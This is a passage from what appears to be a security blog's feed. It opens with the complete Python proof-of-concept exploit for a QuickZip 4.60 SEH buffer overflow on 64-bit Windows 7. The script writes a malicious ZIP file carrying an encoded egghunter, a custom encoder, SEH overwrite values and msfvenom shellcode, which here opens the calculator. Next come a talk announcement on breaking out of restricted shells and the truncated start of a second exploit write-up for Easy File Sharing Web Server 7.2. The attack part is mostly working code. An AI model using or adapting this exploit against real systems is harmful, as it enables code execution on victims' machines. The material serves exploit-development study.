</span><span class='line'><span class="n">shellcode</span> <span class="o">+=</span> <span class="s">&quot;</span><span class="se">\x81\xe4\xf0\xff\xff\xff</span><span class="s">&quot;</span>    <span class="c"># align the stack: AND esp,0xFFFFFFF0</span>
</span><span class='line'><span class="c"># msfvenom -p windows/exec CMD=calc.exe -b &#39;\x00\x0a\x0d&#39;</span>
</span><span class='line'><span class="c"># [*] x86/shikata_ga_nai succeeded with size 227 (iteration=1)</span>
</span><span class='line'><span class="n">shellcode</span> <span class="o">+=</span> <span class="p">(</span><span class="s">&quot;</span><span class="se">\xbf\xdc\xae\x26\x3d\xda\xdd\xd9\x74\x24\xf4\x5b\x31\xc9</span><span class="s">&quot;</span>
</span><span class='line'><span class="s">&quot;</span><span class="se">\xb1\x33\x31\x7b\x12\x03\x7b\x12\x83\x37\x52\xc4\xc8\x3b</span><span class="s">&quot;</span>
</span><span class='line'><span class="s">&quot;</span><span class="se">\x43\x80\x33\xc3\x94\xf3\xba\x26\xa5\x21\xd8\x23\x94\xf5</span><span class="s">&quot;</span>
</span><span class='line'><span class="s">&quot;</span><span class="se">\xaa\x61\x15\x7d\xfe\x91\xae\xf3\xd7\x96\x07\xb9\x01\x99</span><span class="s">&quot;</span>
</span><span class='line'><span class="s">&quot;</span><span class="se">\x98\x0f\x8e\x75\x5a\x11\x72\x87\x8f\xf1\x4b\x48\xc2\xf0</span><span class="s">&quot;</span>
</span><span class='line'><span class="s">&quot;</span><span class="se">\x8c\xb4\x2d\xa0\x45\xb3\x9c\x55\xe1\x81\x1c\x57\x25\x8e</span><span class="s">&quot;</span>
</span><span class='line'><span class="s">&quot;</span><span class="se">\x1d\x2f\x40\x50\xe9\x85\x4b\x80\x42\x91\x04\x38\xe8\xfd</span><span class="s">&quot;</span>
</span><span class='line'><span class="s">&quot;</span><span class="se">\xb4\x39\x3d\x1e\x88\x70\x4a\xd5\x7a\x83\x9a\x27\x82\xb2</span><span class="s">&quot;</span>
</span><span class='line'><span class="s">&quot;</span><span class="se">\xe2\xe4\xbd\x7b\xef\xf5\xfa\xbb\x10\x80\xf0\xb8\xad\x93</span><span class="s">&quot;</span>
</span><span class='line'><span class="s">&quot;</span><span class="se">\xc2\xc3\x69\x11\xd7\x63\xf9\x81\x33\x92\x2e\x57\xb7\x98</span><span class="s">&quot;</span>
</span><span class='line'><span class="s">&quot;</span><span class="se">\x9b\x13\x9f\xbc\x1a\xf7\xab\xb8\x97\xf6\x7b\x49\xe3\xdc</span><span class="s">&quot;</span>
</span><span class='line'><span class="s">&quot;</span><span class="se">\x5f\x12\xb7\x7d\xf9\xfe\x16\x81\x19\xa6\xc7\x27\x51\x44</span><span class="s">&quot;</span>
</span><span class='line'><span class="s">&quot;</span><span class="se">\x13\x51\x38\x02\xe2\xd3\x46\x6b\xe4\xeb\x48\xdb\x8d\xda</span><span class="s">&quot;</span>
</span><span class='line'><span class="s">&quot;</span><span class="se">\xc3\xb4\xca\xe2\x01\xf1\x25\xa9\x08\x53\xae\x74\xd9\xe6</span><span class="s">&quot;</span>
</span><span class='line'><span class="s">&quot;</span><span class="se">\xb3\x86\x37\x24\xca\x04\xb2\xd4\x29\x14\xb7\xd1\x76\x92</span><span class="s">&quot;</span>
</span><span class='line'><span class="s">&quot;</span><span class="se">\x2b\xab\xe7\x77\x4c\x18\x07\x52\x2f\xff\x9b\x3e\x9e\x9a</span><span class="s">&quot;</span>
</span><span class='line'><span class="s">&quot;</span><span class="se">\x1b\xa4\xde</span><span class="s">&quot;</span><span class="p">)</span>
</span></code></pre></td></tr></table></div></figure>


<p>And the final PoC code covering everything discussed so far should look like this:</p>

<figure class='code'><div class="highlight"><table><tr><td class="gutter"><pre class="line-numbers"><span class='line-number'>1</span>
<span class='line-number'>2</span>
<span class='line-number'>3</span>
<span class='line-number'>4</span>
<span class='line-number'>5</span>
<span class='line-number'>6</span>
<span class='line-number'>7</span>
<span class='line-number'>8</span>
<span class='line-number'>9</span>
<span class='line-number'>10</span>
<span class='line-number'>11</span>
<span class='line-number'>12</span>
<span class='line-number'>13</span>
<span class='line-number'>14</span>
<span class='line-number'>15</span>
<span class='line-number'>16</span>
<span class='line-number'>17</span>
<span class='line-number'>18</span>
<span class='line-number'>19</span>
<span class='line-number'>20</span>
<span class='line-number'>21</span>
<span class='line-number'>22</span>
<span class='line-number'>23</span>
<span class='line-number'>24</span>
<span class='line-number'>25</span>
<span class='line-number'>26</span>
<span class='line-number'>27</span>
<span class='line-number'>28</span>
<span class='line-number'>29</span>
<span class='line-number'>30</span>
<span class='line-number'>31</span>
<span class='line-number'>32</span>
<span class='line-number'>33</span>
<span class='line-number'>34</span>
<span class='line-number'>35</span>
<span class='line-number'>36</span>
<span class='line-number'>37</span>
<span class='line-number'>38</span>
<span class='line-number'>39</span>
<span class='line-number'>40</span>
<span class='line-number'>41</span>
<span class='line-number'>42</span>
<span class='line-number'>43</span>
<span class='line-number'>44</span>
<span class='line-number'>45</span>
<span class='line-number'>46</span>
<span class='line-number'>47</span>
<span class='line-number'>48</span>
<span class='line-number'>49</span>
<span class='line-number'>50</span>
<span class='line-number'>51</span>
<span class='line-number'>52</span>
<span class='line-number'>53</span>
<span class='line-number'>54</span>
<span class='line-number'>55</span>
<span class='line-number'>56</span>
<span class='line-number'>57</span>
<span class='line-number'>58</span>
<span class='line-number'>59</span>
<span class='line-number'>60</span>
<span class='line-number'>61</span>
<span class='line-number'>62</span>
<span class='line-number'>63</span>
<span class='line-number'>64</span>
<span class='line-number'>65</span>
<span class='line-number'>66</span>
<span class='line-number'>67</span>
<span class='line-number'>68</span>
<span class='line-number'>69</span>
<span class='line-number'>70</span>
<span class='line-number'>71</span>
<span class='line-number'>72</span>
<span class='line-number'>73</span>
<span class='line-number'>74</span>
<span class='line-number'>75</span>
<span class='line-number'>76</span>
<span class='line-number'>77</span>
<span class='line-number'>78</span>
<span class='line-number'>79</span>
<span class='line-number'>80</span>
<span class='line-number'>81</span>
<span class='line-number'>82</span>
<span class='line-number'>83</span>
<span class='line-number'>84</span>
<span class='line-number'>85</span>
<span class='line-number'>86</span>
<span class='line-number'>87</span>
<span class='line-number'>88</span>
<span class='line-number'>89</span>
<span class='line-number'>90</span>
<span class='line-number'>91</span>
<span class='line-number'>92</span>
<span class='line-number'>93</span>
<span class='line-number'>94</span>
<span class='line-number'>95</span>
<span class='line-number'>96</span>
<span class='line-number'>97</span>
<span class='line-number'>98</span>
<span class='line-number'>99</span>
<span class='line-number'>100</span>
<span class='line-number'>101</span>
<span class='line-number'>102</span>
<span class='line-number'>103</span>
<span class='line-number'>104</span>
<span class='line-number'>105</span>
<span class='line-number'>106</span>
<span class='line-number'>107</span>
<span class='line-number'>108</span>
<span class='line-number'>109</span>
<span class='line-number'>110</span>
<span class='line-number'>111</span>
<span class='line-number'>112</span>
</pre></td><td class='code'><pre><code class='python'><span class='line'><span class="c">#!/usr/bin/python</span>
</span><span class='line'>
</span><span class='line'><span class="n">header_1</span> <span class="o">=</span> <span class="p">(</span><span class="s">&quot;</span><span class="se">\x50\x4B\x03\x04\x14\x00\x00\x00\x00\x00\xB7\xAC\xCE\x34\x00\x00\x00</span><span class="s">&quot;</span>
</span><span class='line'><span class="s">&quot;</span><span class="se">\x00\x00\x00\x00\x00\x00\x00\x00\xe4\x0f\x00\x00\x00</span><span class="s">&quot;</span><span class="p">)</span>
</span><span class='line'>
</span><span class='line'><span class="n">header_2</span> <span class="o">=</span> <span class="p">(</span><span class="s">&quot;</span><span class="se">\x50\x4B\x01\x02\x14\x00\x14\x00\x00\x00\x00\x00\xB7\xAC\xCE\x34\x00\x00\x00</span><span class="s">&quot;</span>
</span><span class='line'><span class="s">&quot;</span><span class="se">\x00\x00\x00\x00\x00\x00\x00\x00\x00\xe4\x0f\x00\x00\x00\x00\x00\x00\x01\x00</span><span class="s">&quot;</span>
</span><span class='line'><span class="s">&quot;</span><span class="se">\x24\x00\x00\x00\x00\x00\x00\x00</span><span class="s">&quot;</span><span class="p">)</span>
</span><span class='line'>
</span><span class='line'><span class="n">header_3</span> <span class="o">=</span> <span class="p">(</span><span class="s">&quot;</span><span class="se">\x50\x4B\x05\x06\x00\x00\x00\x00\x01\x00\x01\x00</span><span class="s">&quot;</span>
</span><span class='line'><span class="s">&quot;</span><span class="se">\x12\x10\x00\x00\x02\x10\x00\x00\x00\x00</span><span class="s">&quot;</span><span class="p">)</span>
</span><span class='line'>
</span><span class='line'><span class="k">print</span> <span class="s">&quot;[+] Building PoC..&quot;</span>
</span><span class='line'>
</span><span class='line'><span class="n">max_size</span> <span class="o">=</span> <span class="mi">4064</span>
</span><span class='line'><span class="n">nseh_offset</span> <span class="o">=</span> <span class="mi">292</span>
</span><span class='line'><span class="n">jump_offset</span> <span class="o">=</span> <span class="mi">92</span>
</span><span class='line'>
</span><span class='line'><span class="c"># msfencode -e x86/alpha_mixed bufferregister=eax -i egghunter-wow64.bin</span>
</span><span class='line'><span class="c"># [*] x86/alpha_mixed succeeded with size 146 (iteration=1)</span>
</span><span class='line'><span class="n">egghunter</span> <span class="o">=</span> <span class="p">(</span><span class="s">&quot;</span><span class="se">\x50\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49</span><span class="s">&quot;</span>
</span><span class='line'><span class="s">&quot;</span><span class="se">\x49\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30</span><span class="s">&quot;</span>
</span><span class='line'><span class="s">&quot;</span><span class="se">\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42</span><span class="s">&quot;</span>
</span><span class='line'><span class="s">&quot;</span><span class="se">\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49\x66\x51\x49\x4b</span><span class="s">&quot;</span>
</span><span class='line'><span class="s">&quot;</span><span class="se">\x52\x73\x53\x63\x62\x73\x36\x33\x4e\x53\x6f\x30\x75\x36</span><span class="s">&quot;</span>
</span><span class='line'><span class="s">&quot;</span><span class="se">\x6d\x51\x59\x5a\x49\x6f\x36\x6f\x72\x62\x71\x42\x42\x4a</span><span class="s">&quot;</span>
</span><span class='line'><span class="s">&quot;</span><span class="se">\x66\x46\x56\x38\x74\x73\x78\x49\x4c\x4b\x4b\x64\x61\x74</span><span class="s">&quot;</span>
</span><span class='line'><span class="s">&quot;</span><span class="se">\x49\x6f\x47\x63\x31\x4e\x50\x5a\x77\x4c\x77\x75\x53\x44</span><span class="s">&quot;</span>
</span><span class='line'><span class="s">&quot;</span><span class="se">\x49\x79\x38\x38\x52\x57\x36\x50\x50\x30\x33\x44\x6c\x4b</span><span class="s">&quot;</span>
</span><span class='line'><span class="s">&quot;</span><span class="se">\x59\x6a\x4e\x4f\x32\x55\x38\x64\x4e\x4f\x70\x75\x6b\x51</span><span class="s">&quot;</span>
</span><span class='line'><span class="s">&quot;</span><span class="se">\x6b\x4f\x79\x77\x41\x41</span><span class="s">&quot;</span><span class="p">)</span>
</span><span class='line'>
</span><span class='line'><span class="n">payload</span> <span class="o">=</span> <span class="n">egghunter</span>
</span><span class='line'><span class="n">payload</span> <span class="o">+=</span> <span class="s">&quot;A&quot;</span> <span class="o">*</span> <span class="p">(</span><span class="n">nseh_offset</span> <span class="o">-</span> <span class="nb">len</span><span class="p">(</span><span class="n">payload</span><span class="p">)</span> <span class="o">-</span> <span class="n">jump_offset</span><span class="p">)</span> <span class="c"># padding for nSEH</span>
</span><span class='line'>
</span><span class='line'><span class="n">payload</span> <span class="o">+=</span> <span class="s">&quot;</span><span class="se">\x41\x41</span><span class="s">&quot;</span>   <span class="c"># INC ECX (acts as NOPs, but with valid character set)</span>
</span><span class='line'>
</span><span class='line'><span class="c"># Offset the stack by 0x632 to start writing to a controlled area of memory</span>
</span><span class='line'><span class="c">#</span>
</span><span class='line'><span class="n">payload</span> <span class="o">+=</span> <span class="s">&quot;</span><span class="se">\x54</span><span class="s">&quot;</span>                   <span class="c"># push esp;</span>
</span><span class='line'><span class="n">payload</span> <span class="o">+=</span> <span class="s">&quot;</span><span class="se">\x58</span><span class="s">&quot;</span>                   <span class="c"># pop eax;</span>
</span><span class='line'><span class="n">payload</span> <span class="o">+=</span> <span class="s">&quot;</span><span class="se">\x05\x33\x07\x01\x01</span><span class="s">&quot;</span>   <span class="c"># add eax, 0x01010733</span>
</span><span class='line'><span class="n">payload</span> <span class="o">+=</span> <span class="s">&quot;</span><span class="se">\x2d\x01\x01\x01\x01</span><span class="s">&quot;</span>   <span class="c"># sub eax, 0x01010101</span>
</span><span class='line'><span class="n">payload</span> <span class="o">+=</span> <span class="s">&quot;</span><span class="se">\x50</span><span class="s">&quot;</span>                   <span class="c"># push eax;</span>
</span><span class='line'><span class="n">payload</span> <span class="o">+=</span> <span class="s">&quot;</span><span class="se">\x5c</span><span class="s">&quot;</span>                   <span class="c"># pop esp;</span>
</span><span class='line'>
</span><span class='line'><span class="c"># Write instructions for: push esp; pop eax; sub eax, 0xBE; jmp eax; jmp 0xee</span>
</span><span class='line'><span class="c">#</span>
</span><span class='line'>                                    <span class="c"># Zero-out EAX</span>
</span><span class='line'><span class="n">payload</span> <span class="o">+=</span> <span class="s">&quot;</span><span class="se">\x25\x01\x01\x01\x01</span><span class="s">&quot;</span>   <span class="c"># and eax,0x01010101</span>
</span><span class='line'><span class="n">payload</span> <span class="o">+=</span> <span class="s">&quot;</span><span class="se">\x25\x10\x10\x10\x10</span><span class="s">&quot;</span>   <span class="c"># and eax,0x10101010</span>
</span><span class='line'>                                       <span class="c"># write 0xeceb90e0 into EAX</span>
</span><span class='line'><span class="n">payload</span> <span class="o">+=</span> <span class="s">&quot;</span><span class="se">\x05\x70\x70\x77\x77</span><span class="s">&quot;</span>   <span class="c"># add eax, 0x77777070</span>
</span><span class='line'><span class="n">payload</span> <span class="o">+=</span> <span class="s">&quot;</span><span class="se">\x05\x70\x20\x74\x77</span><span class="s">&quot;</span>   <span class="c"># add eax, 0x77742070</span>
</span><span class='line'><span class="n">payload</span> <span class="o">+=</span> <span class="s">&quot;</span><span class="se">\x50</span><span class="s">&quot;</span>                   <span class="c"># push eax;</span>
</span><span class='line'>                                    <span class="c"># Zero-out EAX</span>
</span><span class='line'><span class="n">payload</span> <span class="o">+=</span> <span class="s">&quot;</span><span class="se">\x25\x01\x01\x01\x01</span><span class="s">&quot;</span>   <span class="c"># and eax,0x01010101</span>
</span><span class='line'><span class="n">payload</span> <span class="o">+=</span> <span class="s">&quot;</span><span class="se">\x25\x10\x10\x10\x10</span><span class="s">&quot;</span>   <span class="c"># and eax,0x10101010</span>
</span><span class='line'>                                       <span class="c"># write 0xff000000 into EAX</span>
</span><span class='line'><span class="n">payload</span> <span class="o">+=</span> <span class="s">&quot;</span><span class="se">\x05\x01\x01\x01\x77</span><span class="s">&quot;</span>   <span class="c"># add eax, 0x77010101</span>
</span><span class='line'><span class="n">payload</span> <span class="o">+=</span> <span class="s">&quot;</span><span class="se">\x05\x01\x01\x01\x77</span><span class="s">&quot;</span>   <span class="c"># add eax, 0x77010101</span>
</span><span class='line'><span class="n">payload</span> <span class="o">+=</span> <span class="s">&quot;</span><span class="se">\x05\x10\x10\x10\x22</span><span class="s">&quot;</span>   <span class="c"># add eax, 0x22101010</span>
</span><span class='line'><span class="n">payload</span> <span class="o">+=</span> <span class="s">&quot;</span><span class="se">\x2d\x12\x12\x12\x11</span><span class="s">&quot;</span>   <span class="c"># sub eax, 0x11121212</span>
</span><span class='line'><span class="n">payload</span> <span class="o">+=</span> <span class="s">&quot;</span><span class="se">\x50</span><span class="s">&quot;</span>                   <span class="c"># push eax;</span>
</span><span class='line'>                                    <span class="c"># Zero-out EAX</span>
</span><span class='line'><span class="n">payload</span> <span class="o">+=</span> <span class="s">&quot;</span><span class="se">\x25\x01\x01\x01\x01</span><span class="s">&quot;</span>   <span class="c"># and eax,0x01010101</span>
</span><span class='line'><span class="n">payload</span> <span class="o">+=</span> <span class="s">&quot;</span><span class="se">\x25\x10\x10\x10\x10</span><span class="s">&quot;</span>   <span class="c"># and eax,0x10101010</span>
</span><span class='line'>                                       <span class="c"># write 0xbe2d5854 into EAX</span>
</span><span class='line'><span class="n">payload</span> <span class="o">+=</span> <span class="s">&quot;</span><span class="se">\x05\x43\x47\x1c\x67</span><span class="s">&quot;</span>   <span class="c"># add eax, 0x671c4743</span>
</span><span class='line'><span class="n">payload</span> <span class="o">+=</span> <span class="s">&quot;</span><span class="se">\x05\x11\x11\x11\x57</span><span class="s">&quot;</span>   <span class="c"># add eax, 0x57111111</span>
</span><span class='line'><span class="n">payload</span> <span class="o">+=</span> <span class="s">&quot;</span><span class="se">\x50</span><span class="s">&quot;</span>                   <span class="c"># push eax;</span>
</span><span class='line'>
</span><span class='line'><span class="n">payload</span> <span class="o">+=</span> <span class="s">&quot;A&quot;</span> <span class="o">*</span> <span class="p">(</span><span class="n">nseh_offset</span> <span class="o">-</span> <span class="nb">len</span><span class="p">(</span><span class="n">payload</span><span class="p">))</span>    <span class="c"># padding for the rest of encoder</span>
</span><span class='line'>
</span><span class='line'><span class="n">payload</span> <span class="o">+=</span> <span class="s">&quot;</span><span class="se">\x71\x9b\x70\x9b</span><span class="s">&quot;</span>       <span class="c"># nSEH: jno $-99; jo $-99   =&gt; &#39;9b&#39; will actually be converted to &#39;a2&#39;, which is $-92</span>
</span><span class='line'><span class="n">payload</span> <span class="o">+=</span> <span class="s">&quot;</span><span class="se">\x33\x28\x42\x00</span><span class="s">&quot;</span>       <span class="c"># SEH</span>
</span><span class='line'>
</span><span class='line'><span class="n">shellcode</span> <span class="o">=</span> <span class="s">&quot;w00tw00t&quot;</span>                     <span class="c"># egg</span>
</span><span class='line'><span class="n">shellcode</span> <span class="o">+=</span> <span class="s">&quot;</span><span class="se">\x81\xe4\xf0\xff\xff\xff</span><span class="s">&quot;</span>    <span class="c"># align the stack: AND esp,0xFFFFFFF0</span>
</span><span class='line'><span class="c"># msfvenom -p windows/exec CMD=calc.exe -b &#39;\x00\x0a\x0d&#39;</span>
</span><span class='line'><span class="c"># [*] x86/shikata_ga_nai succeeded with size 227 (iteration=1)</span>
</span><span class='line'><span class="n">shellcode</span> <span class="o">+=</span> <span class="p">(</span><span class="s">&quot;</span><span class="se">\xbf\xdc\xae\x26\x3d\xda\xdd\xd9\x74\x24\xf4\x5b\x31\xc9</span><span class="s">&quot;</span>
</span><span class='line'><span class="s">&quot;</span><span class="se">\xb1\x33\x31\x7b\x12\x03\x7b\x12\x83\x37\x52\xc4\xc8\x3b</span><span class="s">&quot;</span>
</span><span class='line'><span class="s">&quot;</span><span class="se">\x43\x80\x33\xc3\x94\xf3\xba\x26\xa5\x21\xd8\x23\x94\xf5</span><span class="s">&quot;</span>
</span><span class='line'><span class="s">&quot;</span><span class="se">\xaa\x61\x15\x7d\xfe\x91\xae\xf3\xd7\x96\x07\xb9\x01\x99</span><span class="s">&quot;</span>
</span><span class='line'><span class="s">&quot;</span><span class="se">\x98\x0f\x8e\x75\x5a\x11\x72\x87\x8f\xf1\x4b\x48\xc2\xf0</span><span class="s">&quot;</span>
</span><span class='line'><span class="s">&quot;</span><span class="se">\x8c\xb4\x2d\xa0\x45\xb3\x9c\x55\xe1\x81\x1c\x57\x25\x8e</span><span class="s">&quot;</span>
</span><span class='line'><span class="s">&quot;</span><span class="se">\x1d\x2f\x40\x50\xe9\x85\x4b\x80\x42\x91\x04\x38\xe8\xfd</span><span class="s">&quot;</span>
</span><span class='line'><span class="s">&quot;</span><span class="se">\xb4\x39\x3d\x1e\x88\x70\x4a\xd5\x7a\x83\x9a\x27\x82\xb2</span><span class="s">&quot;</span>
</span><span class='line'><span class="s">&quot;</span><span class="se">\xe2\xe4\xbd\x7b\xef\xf5\xfa\xbb\x10\x80\xf0\xb8\xad\x93</span><span class="s">&quot;</span>
</span><span class='line'><span class="s">&quot;</span><span class="se">\xc2\xc3\x69\x11\xd7\x63\xf9\x81\x33\x92\x2e\x57\xb7\x98</span><span class="s">&quot;</span>
</span><span class='line'><span class="s">&quot;</span><span class="se">\x9b\x13\x9f\xbc\x1a\xf7\xab\xb8\x97\xf6\x7b\x49\xe3\xdc</span><span class="s">&quot;</span>
</span><span class='line'><span class="s">&quot;</span><span class="se">\x5f\x12\xb7\x7d\xf9\xfe\x16\x81\x19\xa6\xc7\x27\x51\x44</span><span class="s">&quot;</span>
</span><span class='line'><span class="s">&quot;</span><span class="se">\x13\x51\x38\x02\xe2\xd3\x46\x6b\xe4\xeb\x48\xdb\x8d\xda</span><span class="s">&quot;</span>
</span><span class='line'><span class="s">&quot;</span><span class="se">\xc3\xb4\xca\xe2\x01\xf1\x25\xa9\x08\x53\xae\x74\xd9\xe6</span><span class="s">&quot;</span>
</span><span class='line'><span class="s">&quot;</span><span class="se">\xb3\x86\x37\x24\xca\x04\xb2\xd4\x29\x14\xb7\xd1\x76\x92</span><span class="s">&quot;</span>
</span><span class='line'><span class="s">&quot;</span><span class="se">\x2b\xab\xe7\x77\x4c\x18\x07\x52\x2f\xff\x9b\x3e\x9e\x9a</span><span class="s">&quot;</span>
</span><span class='line'><span class="s">&quot;</span><span class="se">\x1b\xa4\xde</span><span class="s">&quot;</span><span class="p">)</span>
</span><span class='line'><span class="n">payload</span> <span class="o">+=</span> <span class="n">shellcode</span>
</span><span class='line'>
</span><span class='line'><span class="n">payload</span> <span class="o">+=</span> <span class="s">&quot;A&quot;</span> <span class="o">*</span> <span class="p">(</span><span class="n">max_size</span> <span class="o">-</span> <span class="nb">len</span><span class="p">(</span><span class="n">payload</span><span class="p">))</span>    <span class="c"># padding</span>
</span><span class='line'><span class="n">payload</span> <span class="o">+=</span> <span class="s">&quot;.txt&quot;</span>
</span><span class='line'>
</span><span class='line'><span class="k">print</span> <span class="s">&quot;[+] Length = &quot;</span> <span class="o">+</span> <span class="nb">str</span><span class="p">(</span><span class="nb">len</span><span class="p">(</span><span class="n">payload</span><span class="p">))</span>
</span><span class='line'>
</span><span class='line'><span class="n">exploit</span> <span class="o">=</span> <span class="n">header_1</span> <span class="o">+</span> <span class="n">payload</span> <span class="o">+</span> <span class="n">header_2</span> <span class="o">+</span> <span class="n">payload</span> <span class="o">+</span> <span class="n">header_3</span> <span class="o">+</span> <span class="n">payload</span>
</span><span class='line'>
</span><span class='line'><span class="n">mefile</span> <span class="o">=</span> <span class="nb">open</span><span class="p">(</span><span class="s">&#39;cst.zip&#39;</span><span class="p">,</span><span class="s">&#39;w&#39;</span><span class="p">);</span>
</span><span class='line'><span class="n">mefile</span><span class="o">.</span><span class="n">write</span><span class="p">(</span><span class="n">exploit</span><span class="p">);</span>
</span><span class='line'><span class="n">mefile</span><span class="o">.</span><span class="n">close</span><span class="p">()</span>
</span><span class='line'>
</span><span class='line'><span class="k">print</span> <span class="s">&quot;[+] Exploit complete!&quot;</span>
</span></code></pre></td></tr></table></div></figure>


<p>When we launch the generated <code>cst.zip</code> file, our exploit will run and after several seconds (as the egghunter goes through the application&rsquo;s memory to locate the &ldquo;egg&rdquo;) we should see the calculator binary open.</p>

<p><a href="http://blog.knapsy.com/images/posts/2017-05-01-quickzip-4-dot-60-win7-x64-seh-overflow-egghunter-with-custom-encoder/32.shellcode%20final.png"><img src="http://blog.knapsy.com/images/posts/2017-05-01-quickzip-4-dot-60-win7-x64-seh-overflow-egghunter-with-custom-encoder/32.shellcode%20final.png" alt="image" /></a></p>

<p>Success!!</p>

<h2>Summary</h2>

<p>That was pretty much it - we have successfully recreated the QuickZip exploit to work on 64 bit Windows 7!</p>

<p>To sum it up, we achieved this by creating an egghunter exploit using very limited allowed character set (pretty much ASCII printable), wrote our own encoder and jumped around the memory to get to the egghunter code and eventually the shellcode.</p>

<p>Few things to keep in mind:</p>

<ul>
<li>find out what characters you&rsquo;re allowed to use and keep that in mind when errors occur</li>
<li>do not get discouraged if the buffer size is not sufficient - get creative!</li>
<li>make sure you use correct egghunter code (32 bit vs. 64 bit) depending on a platform you&rsquo;re developing an exploit for</li>
<li>writing own encoder is not that hard, but it takes lots of practice and patience</li>
<li>make sure to align the stack before executing shellcode</li>
</ul>


<p>Anyway, hope you found it useful! As always, if you have any questions/ideas/suggestions or just wanna chat infosec, feel free to comment below or hit me up on Twitter <a href="https://twitter.com/TheKnapsy">@TheKnapsy</a> or IRC (mainly <strong>#vulnhub</strong> on freenode).</p>
]]></content>
  </entry>
  
  <entry>
    <title type="html"><![CDATA[Escape From SHELLcatraz - Breaking Out of Restricted Unix Shells (SecTalks Melbourne 0x01 2016)]]></title>
    <link href="http://blog.knapsy.com/blog/2016/02/24/escape-from-shellcatraz-breaking-out-of-restricted-unix-shells-sectalks-melbourne-0x01-2016/"/>
    <updated>2016-02-24T20:56:28+11:00</updated>
    <id>http://blog.knapsy.com/blog/2016/02/24/escape-from-shellcatraz-breaking-out-of-restricted-unix-shells-sectalks-melbourne-0x01-2016</id>
    <content type="html"><![CDATA[<p>Today I had a pleasure of presenting at one of the first <a href="http://www.sectalks.org/melbourne/">SecTalks Melbourne</a> sessions - if you&rsquo;re from Melbourne, Australia area and into IT security / geeky stuff, make sure to sign up!</p>

<p>The talked covered basic methodology as well as some tips and tricks on breaking out of restricted Unix shells (such as <code>rbash</code> and <code>rksh</code>) that I came across during several CTFs and also at the &ldquo;real life&rdquo; engagements.</p>

<p>The slides from my talk are available at <a href="https://speakerdeck.com/knaps/escape-from-shellcatraz-breaking-out-of-restricted-unix-shells">SpeakerDeck here</a>.</p>

<p>Enjoy! :)</p>
]]></content>
  </entry>
  
  <entry>
    <title type="html"><![CDATA[Easy File Sharing Web Server v7.2 - Remote SEH Buffer Overflow (DEP Bypass With ROP)]]></title>
    <link href="http://blog.knapsy.com/blog/2015/11/25/easy-file-sharing-web-server-v7-dot-2-remote-seh-buffer-overflow-dep-bypass-with-rop/"/>
    <updated>2015-11-25T20:46:41+11:00</updated>
    <id>http://blog.knapsy.com/blog/2015/11/25/easy-file-sharing-web-server-v7-dot-2-remote-seh-buffer-overflow-dep-bypass-with-rop</id>
    <content type="html"><![CDATA[<p>Just a few weeks ago I attended an amazing training on exploit development on Windows - <a href="https://www.corelan-training.com/index.php/training-2/bootcamp/">Corelan Bootcamp</a>. I have to admit, it&rsquo;s probably the best instructor led course I have ever attended; massive props to Peter &ldquo;<a href="https://twitter.com/corelanc0d3r">corelanc0d3r</a>&rdquo; who is a fantastic teacher and to OJ &ldquo;<a href="https://twitter.com/TheColonial">TheColonial</a>&rdquo; for organising it.</p>

<p>Okay, with credits out of the way, let&rsquo;s talk exploits! Since everything I learned at the bootcamp is still fresh in my head, I thought it will be good to practice it a bit more and make sure all of the information sinks in properly.</p>

<p>So, off I went to <a href="https://exploit-db.com">exploit-db</a> and, after some poking around in DoS and PoC section, I found an exploit that I thought of redesigning and improving - <a href="https://www.exploit-db.com/exploits/38526/">Easy File Sharing Web Server 7.2 - Remote SEH Based Overflow</a>.</p>

<!-- more -->


<p>Everything I described here I&rsquo;ll be treating as a bit of a reference for myself when I forget how things are done. If some parts are unclear or if I skipped some bits and it got confusing, hit me up <a href="https://twitter.com/TheKnapsy">@TheKnapsy</a> or IRC and I&rsquo;ll be happy to chat!</p>

<h2>The Challenge</h2>

<p>Looking at the <a href="https://www.exploit-db.com/exploits/38526/">existing exploit</a>, as you can see, it&rsquo;s a properly working PoC exploit that abuses SEH to achieve code execution, it&rsquo;s remote (which is cool) and&hellip; is actually relatively simple.</p>

<p>However, the main issue is that it assumes we are still living somewhere around 1998 and DEP doesn&rsquo;t exist. Let&rsquo;s rewrite it to bypass DEP and ASLR to make it more suitable for modern environments!</p>

<h2>Preparation</h2>

<p>I won&rsquo;t go into a lot of details around environment setup, I&rsquo;ll assume you have all of the essentials and you know how to configure them properly.</p>

<p>At the very least, you&rsquo;ll need:</p>

<ul>
<li>Windows 7 Professional SP1 x64 (ideally in a VM)</li>
<li>Enabled DEP - as an admin, type in <code>bcdedit /set nx AlwaysOn</code> on the command line</li>
<li>Python</li>
<li><a href="http://debugger.immunityinc.com/">Immunity Debugger</a></li>
<li><a href="https://github.com/corelan/mona">Mona</a> - configure where mona should be saving logs, run <code>!mona config -set workingfolder c:\mona_logs\%p</code> in the Immunity console</li>
<li>Decent text editor - such as <a href="https://notepad-plus-plus.org/">Notepad++</a></li>
<li><a href="https://www.exploit-db.com/apps/60f3ff1f3cd34dec80fba130ea481f31-efssetup.exe">Easy File Sharing Web Server v7.2</a> - duh!</li>
</ul>


<p>With the environment ready to go, let&rsquo;s turn the <a href="https://www.exploit-db.com/exploits/38526/">existing exploit</a> into a more cut down PoC - all we need to know is how to trigger a crash, that&rsquo;s it!</p>

<p>Lets use the code below as a starting point:</p>

<figure class='code'><div class="highlight"><table><tr><td class="gutter"><pre class="line-numbers"><span class='line-number'>1</span>
<span class='line-number'>2</span>
<span class='line-number'>3</span>
<span class='line-number'>4</span>
<span class='line-number'>5</span>
<span class='line-number'>6</span>
<span class='line-number'>7</span>
<span class='line-number'>8</span>
<span class='line-number'>9</span>
<span class='line-number'>10</span>
<span class='line-number'>11</span>
<span class='line-number'>12</span>
<span class='line-number'>13</span>
<span class='line-number'>14</span>
<span class='line-number'>15</span>
<span class='line-number'>16</span>
<span class='line-number'>17</span>
<span class='line-number'>18</span>
<span class='line-number'>19</span>
<span class='line-number'>20</span>
<span class='line-number'>21</span>
<span class='line-number'>22</span>
<span class='line-number'>23</span>
<span class='line-number'>24</span>
<span class='line-number'>25</span>
<span class='line-number'>26</span>
<span class='line-number'>27</span>
<span class='line-number'>28</span>
<span class='line-number'>29</span>
<span class='line-number'>30</span>
</pre></td><td class='code'><pre><code class='python'><span class='line'><span class="kn">import</span> <span class="nn">sys</span><span class="o">,</span> <span class="nn">socket</span><span class="o">,</span> <span class="nn">struct</span>
